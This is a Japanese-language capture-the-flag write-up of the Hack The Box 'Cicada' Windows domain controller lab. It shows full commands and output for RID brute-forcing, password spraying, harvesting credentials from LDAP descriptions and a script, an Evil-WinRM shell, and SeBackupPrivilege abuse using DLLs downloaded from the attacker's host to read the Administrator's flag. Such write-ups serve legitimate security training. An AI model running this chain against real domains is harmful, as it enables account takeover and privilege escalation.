Hack The Box: Cicadaのwriteup。
列挙不足により、自力では初期侵入を達成できなかった。権限昇格はあっさり達成。
以下はnmapのスキャン結果。
└─$ nmap -Pn -A $RHOST -oG general-portscan.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-08 09:19 EDT
Nmap scan report for 10.129.231.149
Host is up (0.48s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-08 20:19:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2022 (88%), Microsoft Windows Server 2012 R2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-08T20:21:06
|_ start_date: N/A
|_clock-skew: 6h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 532.93 ms 10.10.16.1
2 533.72 ms 10.129.231.149
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.73 secondsどうやら標的マシンはドメインコントローラーの模様。
以下のSMB共有フォルダを発見。
└─$ smbclient -L $RHOST
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.231.149 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
DEVとHRというフォルダが目を引いた。
DEVフォルダの中身は権限が無くて覗けなかったが、HRフォルダにはアクセスできた。
└─$ smbclient //$RHOST/HR
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 08:29:09 2024
.. D 0 Thu Mar 14 08:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024Notice from HR.txtというファイルを発見したので、ダウンロード。
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \> 以下はNotice from HR.txtの中身。
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp新入社員向けのパスワードの設定方法の案内だった。デフォルトのパスワードはCicada$M6Corpb*@Lp#nZp!8と判明。しかしユーザー名の記載はなかった。
一通り列挙してみたところ、rpcclientで一部のユーザー名の取得に成功。
まずは認証無しで標的マシンのMS-RPCサービスに接続。
└─$ rpcclient -U "" $RHOST
Password for [WORKGROUP\]:lsaqueryコマンドでドメインのSIDを取得。
rpcclient $> lsaquery
Domain Name: CICADA
Domain Sid: S-1-5-21-917908876-1423158569-3159038727
rpcclient $>
lsaenumsidコマンドで上記のSIDを列挙。
rpcclient $> lsaenumsid S-1-5-21-917908876-1423158569-3159038727
found 20 SIDs
S-1-5-90-0
S-1-5-9
S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
S-1-5-80-0
S-1-5-6
S-1-5-32-559
S-1-5-32-554
S-1-5-32-551
S-1-5-32-550
S-1-5-32-549
S-1-5-32-548
S-1-5-32-545
S-1-5-32-544
S-1-5-21-917908876-1423158569-3159038727-1601
S-1-5-21-917908876-1423158569-3159038727-1109
S-1-5-20
S-1-5-19
S-1-5-18
S-1-5-11
S-1-1-0以下の3つのSIDが目を引いた。
S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
S-1-5-21-917908876-1423158569-3159038727-1601
S-1-5-21-917908876-1423158569-3159038727-1109上記のSIDをlookupsidsコマンドで調べたところ、NT SERVICE\WdiServiceHost、CICADA\emily.oscars、CICADA\Dev Supportというユーザー名を発見。
rpcclient $> lookupsids S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420 NT SERVICE\WdiServiceHost (5)
rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-1601
S-1-5-21-917908876-1423158569-3159038727-1601 CICADA\emily.oscars (1)
rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-1109
S-1-5-21-917908876-1423158569-3159038727-1109 CICADA\Dev Support (2)それぞれのユーザー情報をqueryuserコマンドで調べようとしたが、権限が無いため詳細は分からず。
rpcclient $> queryuser WdiServiceHost
result was NT_STATUS_ACCESS_DENIED
rpcclient $> queryuser emily.oscars
result was NT_STATUS_ACCESS_DENIED
rpcclient $> queryuser 'Dev Support'
result was NT_STATUS_ACCESS_DENIED発見したユーザー名のパスワードはいずれもCicada$M6Corpb*@Lp#nZp!8とは異なっていたようで、初期侵入には使えなかった。
この辺りで行き詰ったので、ヒントを見てみた。以下、ヒント。
In this machine, players will enumerate the domain, identify users, navigate shares, uncover plaintext passwords stored in files, execute a password spray
ヒントで示唆されていることは全て試したのだが。。。列挙に漏れがあったのかもしれない。
で、他所のwriteupを覗いたところ、どうやらcrackmapexecの--rid-bruteで、ユーザーの一覧を取得できるらしい。
さっそく試してみた。
crackmapexec smb $RHOST -u 'anonymous' -p '' -d cicada --rid-brute自分が見つけたCICADA\emily.oscarsやCICADA\Dev Support以外のユーザー名が現れた。
└─$ crackmapexec smb $RHOST -u 'anonymous' -p '' -d cicada --rid-brute
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [+] cicada\anonymous:
SMB 10.129.231.149 445 CICADA-DC [+] Brute forcing RIDs
SMB 10.129.231.149 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.129.231.149 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.231.149 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.129.231.149 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)以下、判明したドメイン・ユーザーの一覧。
CICADA\Administrator
CICADA\Guest
CICADA\krbtgt
CICADA\CICADA-DC$
CICADA\john.smoulder
CICADA\sarah.dantelia
CICADA\michael.wrightson
CICADA\david.orelious
CICADA\Dev Support
CICADA\emily.oscars
上記のユーザー群に対してパスワード・スプレーを行ったところ、ユーザーcicada\michael.wrightsonがデフォルトのパスワードCicada$M6Corpb*@Lp#nZp!8を使用していることが判明。(Dev Supportも認証に成功しているように見えるが、これは誤検知。)
└─$ crackmapexec smb $RHOST -u users.txt -p pass.txt -d cicada --continue-on-success
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada) (signing:True) (SMBv1:False)
SMB 10.129.231.149 445 CICADA-DC [-] cicada\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [+] cicada\Dev Support:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.231.149 445 CICADA-DC [-] cicada\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [+] cicada\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.129.231.149 445 CICADA-DC [-] cicada\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.231.149 445 CICADA-DC [-] cicada\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE入手したクレデンシャルmichael.wrightson:Cicada$M6Corpb*@Lp#nZp!8を用いて以下のLDAPクエリを送ったところ、aRt$Lp#7t*VQ!3というパスワードを発見。
└─$ ldapsearch -H ldap://$RHOST -D 'cicada\michael.wrightson' -w 'Cicada$M6Corpb*@Lp#nZp!8' -b "DC=cicada,DC=htb" | grep -i desc
description: Default container for upgraded user accounts
description: Default container for upgraded computer accounts
-- <snipped> --
description: Just in case I forget my password is aRt$Lp#7t*VQ!3どうやらパスワードの持ち主はdavid.oreliousの模様。
└─$ ldapsearch -H ldap://$RHOST -D 'cicada\michael.wrightson' -w 'Cicada$M6Corpb*@Lp#nZp!8' -b "DC=cicada,DC=htb" | grep -C 25 'my password'
pwdLastSet: 133548922493737634
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAjC22Nimt01QHG0u8UgQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: michael.wrightson
sAMAccountType: 805306368
userPrincipalName: michael.wrightson@cicada.htb
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cicada,DC=htb
dSCorePropagationData: 20240828172622.0Z
dSCorePropagationData: 20240822173938.0Z
dSCorePropagationData: 20240314181531.0Z
dSCorePropagationData: 20240314172956.0Z
dSCorePropagationData: 16010714224104.0Z
lastLogonTimestamp: 133956702610535158
msDS-SupportedEncryptionTypes: 0
# David Orelious, Users, cicada.htb
dn: CN=David Orelious,CN=Users,DC=cicada,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: David Orelious
sn: Orelious
description: Just in case I forget my password is aRt$Lp#7t*VQ!3
givenName: David
initials: D
distinguishedName: CN=David Orelious,CN=Users,DC=cicada,DC=htb
instanceType: 4
whenCreated: 20240314121729.0Z
whenChanged: 20240828172557.0Z
uSNCreated: 20569
uSNChanged: 122945
name: David Orelious
objectGUID:: vLT9wKgMqkOmSQuC/2CSVw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 133549578189522494
lastLogoff: 0
lastLogon: 133549579419992639
pwdLastSet: 133548922495138483
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAjC22Nimt01QHG0u8VAQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: david.orelious
sAMAccountType: 805306368
userPrincipalName: david.orelious@cicada.htb入手したクレデンシャルdavid.orelious:aRt$Lp#7t*VQ!3を用いて、冒頭で発見したDEVフォルダにアクセスできた。
└─$ smbclient //$RHOST/DEV -U 'david.orelious'
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 08:31:39 2024
.. D 0 Thu Mar 14 08:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 13:28:22 2024
4168447 blocks of size 4096. 478357 blocks availableBackup_script.ps1というファイルを見つけたので、ダウンロード。
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> 以下はBackup_script.ps1の中身。
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"どうやらC:\smbフォルダの内容物をバックアップするためのスクリプトの模様。emily.oscarsというユーザー名とQ!3@Lp#M6b*7t*Vtというパスワードがばっちりハードコードされていた。
入手したクレデンシャルemily.oscars:Q!3@Lp#M6b7tVtを用いて標的マシンにWinRM接続できた。
└─$ evil-winrm -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -i $RHOST
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> hostname
CICADA-DC一般ユーザーのフラグC:\Users\emily.oscars.CICADA\desktop\user.txtを入手。
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir C:\Users\emily.oscars.CICADA\desktop
Directory: C:\Users\emily.oscars.CICADA\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/22/2025 1:34 PM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type C:\Users\emily.oscars.CICADA\desktop\user.txt
7e8e0c36e23a080757b3453e<REDACTED>続いて権限昇格である。
列挙の結果、rootユーザーのフラグC:\Users\Administrator\Desktop\root.txtを発見。
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> Get-ChildItem -Path C:\Users\ -Include *.ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.zip,*.xml -File -Recurse -ErrorAction SilentlyContinue
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/22/2025 1:34 PM 34 root.txt
Directory: C:\Users\emily.oscars.CICADA\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/22/2025 1:34 PM 34 user.txtしかし、当然読み取り権限はない。
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> type C:\Users\Administrator\Desktop\root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:1
+ type C:\Users\Administrator\Desktop\root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand列挙を続けたところ、ユーザーemily.oscarsはSeBackupPrivilege権限とSeRestorePrivilege権限を有していることが判明。
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledさらにユーザーはBUILTIN\Backup Operatorsに所属していた。
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288これらのバックアップ用の権限を悪用すれば、本来ユーザーがアクセスできないファイルやディレクトリにもアクセスできる (今回の場合はC:\Users\Administrator\Desktop\root.txt)。
まず標的マシンにSeBackupPrivilegeUtils.dllとSeBackupPrivilegeCmdLets.dllを仕込む。
iwr -uri http://10.10.16.174/SeBackupPrivilegeCmdLets.dll -Outfile SeBackupPrivilegeCmdLets.dll
iwr -uri http://10.10.16.174/SeBackupPrivilegeUtils.dll -Outfile SeBackupPrivilegeUtils.dll仕込んだDLLをインポート。
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dllSeBackupPrivilegeを有効化。
Set-SeBackupPrivilegeCopy-FileSeBackupPrivilegeでrootユーザーのフラグC:\Users\Administrator\Desktop\root.txtをC:\Users\emily.oscars.CICADA\gotcha.txtにコピー。
Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\root.txt C:\Users\emily.oscars.CICADA\gotcha.txt -Overwrite*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\root.txt C:\Users\emily.oscars.CICADA\gotcha.txt -Overwrite
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> dir
Directory: C:\Users\emily.oscars.CICADA
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 8/28/2024 10:32 AM Desktop
d-r--- 8/22/2024 2:22 PM Documents
d-r--- 5/8/2021 1:20 AM Downloads
d-r--- 5/8/2021 1:20 AM Favorites
d-r--- 5/8/2021 1:20 AM Links
d-r--- 5/8/2021 1:20 AM Music
d-r--- 5/8/2021 1:20 AM Pictures
d----- 5/8/2021 1:20 AM Saved Games
d-r--- 5/8/2021 1:20 AM Videos
-a---- 6/22/2025 2:50 PM 34 gotcha.txt
-a---- 6/22/2025 2:47 PM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 6/22/2025 2:47 PM 16384 SeBackupPrivilegeUtils.dllC:\Users\emily.oscars.CICADA\gotcha.txtを開いてrootユーザーのフラグを入手。
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> type C:\Users\emily.oscars.CICADA\gotcha.txt
eb963e552d68169d68a48825<REDACTED>